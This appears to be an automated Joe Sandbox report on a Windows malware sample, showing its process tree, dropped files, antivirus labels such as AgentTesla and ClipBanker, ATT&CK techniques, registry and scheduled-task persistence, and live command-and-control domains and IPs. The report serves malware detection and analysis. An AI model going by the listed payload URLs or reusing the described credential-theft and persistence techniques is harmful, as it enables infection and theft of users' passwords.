                      Source: Yara match | File source: Process Memory Space: neworigin.exe PID: 3796, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: neworigin.exe PID: 2968, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                      Remote Access Functionality

                      Source: Yara match | File source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: neworigin.exe PID: 3796, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: neworigin.exe PID: 2968, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: neworigin.exe PID: 5328, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      ATT&CK Matrix (techniques grouped by tactic column; a number in parentheses is the badge the report shows next to that technique)

                      • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
                      • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
                      • Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                      • Execution: Windows Management Instrumentation (121); Native API (11); Shared Modules (1); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Service Execution (2); Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
                      • Persistence: DLL Side-Loading (1); Valid Accounts (1); Windows Service (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                      • Privilege Escalation: DLL Side-Loading (1); Valid Accounts (1); Access Token Manipulation (1); Windows Service (1); Process Injection (311); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                      • Defense Evasion: Disable or Modify Tools (21); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); Timestomp (1); DLL Side-Loading (1); Masquerading (311); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (151); Process Injection (311); Stripped Payloads; Embedded Payloads
                      • Credential Access: OS Credential Dumping (2); Input Capture (21); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                      • Discovery: System Time Discovery (1); Account Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (3); System Information Discovery (47); Query Registry (1); Security Software Discovery (341); Process Discovery (1); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Owner/User Discovery (1); System Network Configuration Discovery (1)
                      • Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
                      • Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (21); Clipboard Data (1); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
                      • Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (123); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
                      • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
                      • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 1554496 | Sample: x.exe | Startdate: 12/11/2024 | Architecture: WINDOWS | Score: 100

                      Start
                        DNS/IP: s82.gocheapweb.com; pywolwnvd.biz; 2 other IPs or domains
                        Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 11 other signatures
                        Processes started:
                          x.exe 1 7
                            DNS/IP: gxe0.com 198.252.105.91, 443, 49709, 49710 HAWKHOSTCA Canada
                            Dropped: C:\Users\Public\Libraries\lxsyrsiW.pif, PE32; C:\Users\Public\Wisrysxl.url, MS; C:\Users\Public\Libraries\Wisrysxl, data
                            Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                            Processes started:
                              lxsyrsiW.pif 4
                                Dropped: C:\Users\user\AppData\...\server_BTC.exe, PE32; C:\Users\user\AppData\Local\...\neworigin.exe, PE32; C:\Program Files (x86)\...\armsvc.exe, PE32
                                Signatures: Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
                                Processes started:
                                  server_BTC.exe 7
                                    Dropped: C:\Users\user\AppData\...\TrojanAIbot.exe, PE32
                                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
                                    Processes started:
                                      powershell.exe
                                        Signatures: Loading BitLocker PowerShell Module
                                        Processes started: conhost.exe; WmiPrvSE.exe
                                      cmd.exe
                                        Processes started: conhost.exe; timeout.exe
                                      schtasks.exe
                                        Processes started: conhost.exe
                                      TrojanAIbot.exe
                                  neworigin.exe 15 2
                                    DNS/IP: s82.gocheapweb.com 51.195.88.199, 49714, 49729, 49764 OVHFR France; api.ipify.org 104.26.13.205, 443, 49712, 49750 CLOUDFLARENETUS United States
                                    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access)
                              cmd.exe 1
                                Processes started:
                                  esentutl.exe 2
                                    Dropped: C:\Users\Public\alpha.pif, PE32
                                    Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                                  conhost.exe
                              esentutl.exe 2
                                Dropped: C:\Users\Public\Libraries\Wisrysxl.PIF, PE32
                                Processes started: conhost.exe
                          Wisrysxl.PIF
                            Signatures: Sample uses process hollowing technique
                            Processes started:
                              lxsyrsiW.pif
                                Processes started:
                                  neworigin.exe
                                    Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook
                                  server_BTC.exe
                          Wisrysxl.PIF
                            Signatures: Multi AV Scanner detection for dropped file
                            Processes started:
                              lxsyrsiW.pif
                                Processes started: neworigin.exe; server_BTC.exe
                          2 other processes
                            Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file

                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Local\Temp\neworigin.exe | 100% | Avira | TR/Spy.Gen8 |
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | 100% | Avira | HEUR/AGEN.1311721 |
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe | 100% | Avira | HEUR/AGEN.1311721 |
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen |
                      C:\Users\user\AppData\Local\Temp\neworigin.exe | 100% | Joe Sandbox ML | |
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | 100% | Joe Sandbox ML | |
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe | 100% | Joe Sandbox ML | |
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | |
                      C:\Users\Public\Libraries\Wisrysxl.PIF | 29% | ReversingLabs | Win32.Infostealer.Tinba |
                      C:\Users\Public\Libraries\lxsyrsiW.pif | 3% | ReversingLabs | |
                      C:\Users\Public\alpha.pif | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Temp\neworigin.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe | 66% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker |
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | 66% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker |
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      https://gxe0.com/yak/233_Wisrysx | 0% | Avira URL Cloud | safe |
                      https://gxe0.com/yak/233_Wisrysxlfss | 0% | Avira URL Cloud | safe |
                      https://gxe0.com/t | 0% | Avira URL Cloud | safe |
                      https://gxe0.com:443/yak/233_WisrysxlfssX | 0% | Avira URL Cloud | safe |
                      http://s82.gocheapweb.com | 0% | Avira URL Cloud | safe |
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      gxe0.com | 198.252.105.91 | true | false | | high
                      api.ipify.org | 104.26.13.205 | true | false | | high
                      s82.gocheapweb.com | 51.195.88.199 | true | false | | high
                      pywolwnvd.biz | 54.244.188.177 | true | false | | high
                      Name | Malicious | Antivirus Detection | Reputation
                      https://api.ipify.org/ | false | | high
                      https://gxe0.com/yak/233_Wisrysxlfss | true | Avira URL Cloud: safe | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp | false | | high
                      http://nuget.org/NuGet.exe | powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://gxe0.com/yak/233_Wisrysx | x.exe, 00000000.00000002.2233962338.0000000020CAD000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                      https://sectigo.com/CPS0 | x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp | false | | high
                      https://account.dyn.com/ | neworigin.exe, 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp | false | | high
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp | false | | high
                      http://ocsp.sectigo.com0 | x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp | false | | high
                      http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://r11.o.lencr.org0# | neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://crl.microsoft | powershell.exe, 0000000B.00000002.2308580044.0000000007D02000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2264345961.0000000000542000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp | false | | high
                      https://contoso.com/License | powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp | false | |
                                                              high
                                                              https://api.ipify.org/tneworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://r11.i.lencr.org/0neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.ipify.orgneworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://gxe0.com/tx.exe, 00000000.00000002.2184605014.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://aka.ms/pscore6lBpowershell.exe, 0000000B.00000002.2269466131.0000000004171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.c.lencr.org/0neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2494316547.0000000006422000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/0neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2494316547.0000000006422000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contoso.com/powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://s82.gocheapweb.comneworigin.exe, 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameneworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2269466131.0000000004171000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.pmail.comx.exe, x.exe, 00000000.00000002.2243776904.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2244527855.000000002206F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2180899022.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111145235.0000000002C11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2200179187.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2262163417.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2181503594.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2352049831.0000000002D22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000018.00000000.2336227084.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 0000001B.00000002.2435548911.0000000002DF2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.2411094000.0000000000416000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                      high
                                                                                      http://ocsp.sectigo.com0Cx.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://gxe0.com:443/yak/233_WisrysxlfssXx.exe, 00000000.00000002.2184605014.0000000000899000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
198.252.105.91 | gxe0.com | Canada | 20068 | HAWKHOSTCA | false
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
51.195.88.199 | s82.gocheapweb.com | France | 16276 | OVHFR | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554496
Start date and time: 2024-11-12 15:54:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: x.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winEXE@47/24@4/3
EGA Information:
• Successful, ratio: 61.5%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 274
• Number of non-executed functions: 52
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target TrojanAIbot.exe, PID 6628 because it is empty
• Execution Graph export aborted for target neworigin.exe, PID 5328 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3132 because it is empty
• Execution Graph export aborted for target server_BTC.exe, PID 1268 because it is empty
• Execution Graph export aborted for target server_BTC.exe, PID 2532 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: x.exe
Time | Type | Description
09:54:59 | API Interceptor | 2x Sleep call for process: x.exe modified
09:55:11 | API Interceptor | 5974887x Sleep call for process: neworigin.exe modified
09:55:12 | API Interceptor | 16x Sleep call for process: powershell.exe modified
09:55:13 | API Interceptor | 2923500x Sleep call for process: TrojanAIbot.exe modified
09:55:20 | API Interceptor | 2x Sleep call for process: Wisrysxl.PIF modified
15:55:11 | Task Scheduler | Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
15:55:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
15:55:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
15:55:28 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
198.252.105.91 | DHL-INVOICE-MBV.exe | malicious | FormBook, GuLoader | www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
104.26.13.205 | 2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
